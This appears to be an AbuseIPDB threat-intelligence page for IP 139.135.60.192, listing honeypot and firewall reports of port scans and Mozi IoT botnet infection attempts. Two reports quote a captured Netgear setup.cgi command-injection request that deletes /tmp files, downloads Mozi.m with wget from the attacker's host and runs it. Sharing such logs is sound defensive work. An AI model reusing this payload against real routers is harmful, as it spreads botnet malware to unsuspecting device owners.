JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 139.135.60.192

139.135.60.192 was found in our database!

This IP was reported 67 times. Confidence of Abuse is 39%: ?

39%

ISP	Cyber Internet Services Pakistan
Usage Type	Fixed Line ISP
ASN	AS9541
Domain Name	cyber.net.pk
Country	🇵🇰 Pakistan
City	Rawalpindi, Punjab

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 139.135.60.192

Whois 139.135.60.192

IP Abuse Reports for 139.135.60.192:

This IP address has been reported a total of 67 times from 31 distinct sources. 139.135.60.192 was first reported on July 29th 2025, and the most recent report was 2 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 PeravixGroup	2026-06-10 02:29:58 (2 days ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇬🇧 PeravixGroup	2026-06-06 22:17:22 (5 days ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇬🇧 PeravixGroup	2026-06-04 15:28:41 (1 week ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇫🇷 ISPLtd	2026-06-02 00:38:17 (1 week ago)	Jun 1 21:38:14 139.135.60.192 TCP SPT=12508 DPT=8080 SYN Jun 1 21:38:15 139.135.60.192 TCP SPT=125 ... show more Jun 1 21:38:14 139.135.60.192 TCP SPT=12508 DPT=8080 SYN Jun 1 21:38:15 139.135.60.192 TCP SPT=12508 DPT=8080 SYN Jun 1 21:38:17 139.135.60.192 TCP SPT=12508 DPT=8080 ... show less	Port Scan
🇬🇧 PeravixGroup	2026-05-29 09:33:32 (2 weeks ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8443. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇧🇪 boxed-it	2026-05-23 15:59:22 (2 weeks ago)	POST /GponForm/diag_Form?images/ (Tarpitted for 1d15h8m28s, wasted 8.06MB)	Web App Attack
🇬🇧 knock	2026-05-16 12:34:28 (3 weeks ago)	Knock-Knock honeypot brute-force: proto8 (1 total hits)	Brute-Force
🇮🇪 RoboSOC	2026-05-14 17:49:35 (4 weeks ago)	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: PTR record not found	Hacking
🇺🇸 sefinek.net	2026-05-12 09:33:02 (1 month ago)	Blocked by UFW on NY01 [23/tcp] \| SPT: 13005 \| TTL: 48 \| LEN: 40 \| TOS: 0x00 • Reported by: github.c ... show more Blocked by UFW on NY01 [23/tcp] \| SPT: 13005 \| TTL: 48 \| LEN: 40 \| TOS: 0x00 • Reported by: github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan IoT Targeted
🇺🇸 RAP	2026-05-12 02:32:02 (1 month ago)	2026-05-12 02:32:02 UTC Unauthorized activity to TCP port 8080. Web App	Port Scan Web App Attack
🇺🇸 MPL	2026-05-10 17:37:25 (1 month ago)	tcp/37215 (4 or more attempts)	Port Scan
🇨🇳 ThreatBook.io	2026-04-27 00:06:50 (1 month ago)	ThreatBook Intelligence: Edu,Zombie more details on https://threatbook.io/ip/139.135.60.192 2026-04- ... show more ThreatBook Intelligence: Edu,Zombie more details on https://threatbook.io/ip/139.135.60.192 2026-04-26 09:22:51 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.135.60.192:50258/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	Web App Attack
🇸🇪 donarev419	2026-04-17 06:15:14 (1 month ago)	Connection to port 8080 with data transfer. Data preview: GET /setup.cgi?next_file=netgear.cfg&todo= ... show more Connection to port 8080 with data transfer. Data preview: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.135.60.192:54620/ show less	Port Scan Hacking
🇺🇸 MPL	2026-04-12 19:37:37 (1 month ago)	tcp/80 (8 or more attempts)	Port Scan
🇫🇷 sthoyer.de	2026-04-04 13:54:23 (2 months ago)	Apr 4 15:54:22 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f ... show more Apr 4 15:54:22 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f7:08:00 SRC=139.135.60.192 DST=173.212.223.67 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=35636 PROTO=TCP SPT=29137 DPT=23 WINDOW=14715 RES=0x00 SYN URGP=0 ... show less	Port Scan

Showing 1 to 15 of 67 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇬🇧 193.32.209.242

🇹🇷 185.226.93.35

🇧🇷 152.32.200.243

🇰🇷 112.216.129.27

🇮🇩 103.180.124.164

🇵🇰 101.53.225.63

🇫🇷 85.217.140.13

🇵🇰 43.242.176.211

🇮🇳 223.185.61.165

🇹🇳 196.177.224.90

🇦🇱 185.226.89.235

🇧🇷 177.105.242.193

🇺🇸 172.235.129.66

🇺🇸 139.180.33.6

🇵🇰 110.93.224.226

🇫🇷 85.217.140.11

🇨🇳 58.19.80.208

🇮🇪 52.18.54.12

🇬🇧 35.203.210.212

🇮🇳 2401:4900:8826:ab22:99d2:92c1:e126:f670